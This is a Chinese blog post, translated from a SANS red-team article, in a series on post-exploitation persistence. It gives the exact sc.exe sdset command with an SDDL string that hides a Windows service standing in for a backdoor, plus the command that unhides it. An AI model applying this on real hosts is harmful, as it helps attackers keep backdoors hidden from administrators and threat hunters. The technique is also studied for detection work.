WEB渗透权限维持篇-隐藏windows服务

往期文章
WEB渗透权限维持篇-DLL注入\劫持-CSDN博客

WEB渗透权限维持篇-CLR-Injection-CSDN博客

WEB渗透权限维持篇-计划任务-CSDN博客

WEB渗透权限维持篇-DLL注入-修改内存中的PE头-CSDN博客

WEB渗透权限维持篇-DLL注入-进程挖空(MitreT1055.012)-CSDN博客

WEB渗透权限维持篇-MSSQL后门-CSDN博客

WEB渗透权限维持篇-禁用Windows事件日志-CSDN博客

WEB渗透权限维持篇-映像劫持-CSDN博客

复制代码
Translate from: https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

Windows的一个功能允许红队或攻击者将服务隐藏起来,从而为逃避基于主机的常见威胁搜寻技术的检测提供了机会。

这里假设Fax服务是我们的恶意文件或后门

打开services.msc可以看到服务

复制代码
执行命令可以看到服务
复制代码
管理员权限下执行以下命令,安全标识符定义语言(SDDL)
复制代码
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
复制代码
可以看到已经查询不到了
复制代码
在红队或渗透测试中,这可能是一种有用的技术,可以在受感染主机上保持持久性。重启后,隐藏的服务也会自动启动。
取消隐藏的命令
& $env:SystemRoot\System32\sc.exe sdset SWCUEngine "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;  CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
相关推荐
TeleostNaCl13 小时前
一种使用 PowerToys 的键盘管理器工具编辑惠普暗影精灵11 的 OMEN 自定义按键的方法
windows·经验分享·计算机外设·1024程序员节
Magnum Lehar19 小时前
网络安全端口安全映射工具编写代码1
windows·1024程序员节
JuicyActiveGilbert1 天前
【Python进阶】第2篇:单元测试
开发语言·windows·python·单元测试
独行soc1 天前
2025年渗透测试面试题总结-215(题目+回答)
网络·安全·web安全·adb·渗透测试·1024程序员节·安全狮
YuanlongWang1 天前
C# 设计模式——观察者
windows·设计模式·c#
YongCheng_Liang1 天前
Windows CMD 常用命令:7 大核心模块速查指南(附实战场景)
运维·服务器·windows·1024程序员节
Bruce_Liuxiaowei1 天前
[特殊字符] C&C服务器:网络攻击的指挥中心
运维·服务器·网络安全
wkj0011 天前
conda创建在指定目录创建项目
linux·windows·conda
想学全栈的菜鸟阿董1 天前
CrewAI 核心概念 团队(Crews)篇
windows